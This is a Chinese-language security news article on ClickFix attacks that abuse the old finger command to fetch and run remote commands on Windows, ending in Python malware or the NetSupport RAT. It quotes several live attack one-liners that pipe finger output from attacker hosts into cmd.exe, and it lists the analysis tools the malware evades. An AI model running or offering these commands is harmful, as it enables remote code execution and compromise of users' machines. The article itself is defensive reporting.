歡迎登入資安人
若您還不是會員,請點選下方加入會員
忘記密碼
加入資安人會員
登入
新聞
觀點
解決方案
活動
訂閱電子報
資安人粉絲團
聯絡我們
關於我們
合作詢問
隱私權政策
香港商法蘭克福展覽有限公司台灣傳媒分公司
110 台北市信義區市民大道六段288號8F
886-2-8729-1099
新聞
觀點
解決方案
活動
訂閱電子報
登入
登入
訂閱電子報
新聞
觀點
解決方案
活動
新聞
您現在位置 : 首頁 >
新聞
駭客濫用數十年前的 Finger 協定發動 ClickFix 攻擊
2025 / 11 / 20
編輯部
數十年歷史的 Finger 指令最近在資安威脅中捲土重來,攻擊者利用此協定在 Windows 裝置上遠端執行惡意命令。
Finger 指令過去用於查詢 Unix 與 Linux 系統上的使用者資訊,後來也被加入 Windows 系統。執行後會回傳使用者的登入名稱、姓名、主目錄、電話號碼、最後登入時間等基本資訊。儘管仍受支援,但與數十年前的普及程度相比,現今已很少被使用。
近期出現多起利用 Finger 協定的惡意攻擊活動,攻擊者透過遠端伺服器取得惡意指令並在受害裝置上執行。
早在 2020 年,研究人員就已警告駭客將 Finger 指令當作 Living Off the Land Binary(LOLBIN)來下載惡意軟體並規避偵測。
攻擊手法解析
10 月,資安研究人員 MalwareHunterTeam 分享了一個批次檔案樣本。該檔案執行後會使用「finger root@finger.nateams[.]com」指令從遠端 Finger 伺服器取得命令,再透過 cmd.exe 在本地執行。
Reddit 上有使用者發文警告遭遇類似攻擊。駭客偽裝成 Captcha 驗證頁面,誘騙受害者執行 Windows 指令來「證明自己是真人」。受害者在命令提示字元中輸入了以下指令:「cmd /c start "" /min cmd /c "finger vke@finger.cloudmega[.]org | cmd" && echo' Verify you are humanpress ENTER'」。
這種攻擊利用 Finger 協定作為遠端腳本傳遞機制。執行 finger 指令後,輸出內容會被導向 Windows 命令處理器 cmd.exe。取得的命令會執行以下動作:建立隨機命名的路徑、將 curl.exe 複製為隨機檔名、使用重新命名的 curl 下載偽裝成 PDF 的 zip 壓縮檔、解壓縮出 Python 惡意軟體套件。接著使用「pythonw.exe init.py」執行 Python 程式。最後回傳確認訊息給攻擊者伺服器,同時向使用者顯示假的「驗證你是真人」提示。
研究人員發現另一個進化版攻擊,使用「finger Kove2@api.metrics-strange.com | cmd」取得並執行類似指令。
此版本會先檢查受害系統是否存在惡意軟體分析工具,包括 filemon、regmon、procexp、Wireshark、Fiddler、IDA、x64dbg、OllyDbg、ProcessHacker 等
。若未偵測到這些工具,就會下載偽裝成 PDF 的 zip 檔案並解壓縮。不過這次解出的不是 Python 套件,而是 NetSupport Manager 遠端存取木馬(RAT)。攻擊者會設定排程工作,讓惡意軟體在使用者登入時自動啟動。
目前這類 Finger 協定濫用攻擊似乎出自單一駭客發動的 ClickFix 攻擊活動。對防禦者而言,最有效的阻擋方式是封鎖 TCP port 79 的對外流量,因為這是 Finger 協定 daemon 使用的連線埠。
本文轉載自 BleepingComputer。
Finger協定
ClickFix
LOLBIN
最新活動
2026.01.16
2026 高科技產業供應鏈機制與安全管理和ISO相關標準高峰論壇
2026.04.13
CRA 法規倒數計時!透過 ISA/IEC 62443 IC47課程 打造符合歐盟標準的資安產品
看更多活動
大家都在看
立院三讀通過《人工智慧基本法》 資安與安全列入七大治理原則 國科會任主管機關
UEFI韌體漏洞威脅主流主機板,華碩、技嘉、微星、華擎產品受影響
資安院規劃115年資安治理AI化計畫 邀A、B級機關共同研發
對抗提示詞注入與資源耗盡攻擊 資策會 AI 弱掃工具模擬駭客手法揪漏洞
Android木馬程式Cellik整合Google Play商店,讓攻擊者完全遠端控制裝置
資安人科技網
文章推薦
假冒PoC漏洞利用程式散布Webrat惡意軟體,鎖定資安新手與駭客
報告:2025 年共有 306 個勒索軟體組織處於活躍狀態
資安院規劃115年資安治理AI化計畫 邀A、B級機關共同研發